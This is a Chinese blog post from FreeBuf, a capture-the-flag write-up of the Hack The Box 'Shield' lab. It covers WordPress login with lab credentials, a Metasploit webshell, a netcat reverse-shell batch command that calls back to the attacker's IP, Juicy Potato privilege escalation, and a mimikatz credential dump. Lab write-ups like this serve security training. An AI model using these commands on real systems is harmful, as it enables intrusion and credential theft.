记HACK THE BOX Shield靶场拿flag
2021-03-02 14:42:32 Author: www.freebuf.com(查看原文) 阅读量:84 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

目标网站ip:10.10.10.29最终目的:拿到flag,提升到管理员权限。

一:起手访问网页,nmap跑一下

1614662904_603dccf8f3c2d8343b8e1.png!small?1614662906274

1614662921_603dcd09d2439806bf528.png!small?1614662922870

发现开放了80和3306俩个端口

二:使用工具dirsearch跑一下目录结构,发现wordpress这个cms,访问一下

1614663002_603dcd5a67edf5d49036e.png!small?1614663003471

发现有个登录页面,根据提示是上个靶场的账号和密码,登录进去

账号:admin

密码:P@s5w0rd!

1614663036_603dcd7cd3cc1b6598d35.png!small?1614663037808

三:登录进去之后,利用msfconsole获取webshell。

msfconsole                                       //进入kali的metasploit攻击框架

search wp_admin                              //查找wordpress获取webshell的利用模块

use 0                                                //使用编号为0的模块

show options                             //显示设置需要配置的参数

设置参数

1614663101_603dcdbde11fa0ff29982.png!small?1614663102833

成功获得权限,但回连之后特别容易断

1614663136_603dcde05ca7d2fc00bf9.png!small?1614663137337

查看系统信息

1614663165_603dcdfd84b8ea622085b.png!small?1614663166468

四:解决连接不稳定,上传nc64位到服务器上运行,kali机进行监听

1614663239_603dce47b22e930726d01.png!small?1614663240696

Kaili端就会返回一个cmd命令行

1614663272_603dce6817ecf35169545.png!small?1614663273086

五:因为系统是windows server 2016,此系统容易受到Rotten Potato攻击

用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat

使用多汁的土豆这个工具去执行生成shell.bat,并设置监听端口1111

JP.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\nihao.bat -l 1337

1614663331_603dcea30736993105833.png!small?1614663331982

但奇怪的是,1111端口一直没有返回监听,可能设置出来问题我就改了端口,改为了4567就返回了shell,提权成功,是管理员权限

1614663370_603dceca253401f248f32.png!small?1614663371120

六:查看桌面,拿flag:6e9a9fdc6f64e410a68b847bb4b404fa

1614663410_603dcef2bfe5693848a31.png!small?1614663412034

七:使用mimikatz扫域内其他成员机

上传mimikatz到靶机上去

1614663484_603dcf3cd3d7f255aa891.png!small?1614663485749

执行mimikatz命令获取域内账户和密码

1614663502_603dcf4e1d70b6649ecef.png!small?1614663503065

获得了一个账号名:sandra   密码:Password1234!


文章来源: https://www.freebuf.com/articles/web/264831.html
如有侵权请联系:admin#unsafe.sh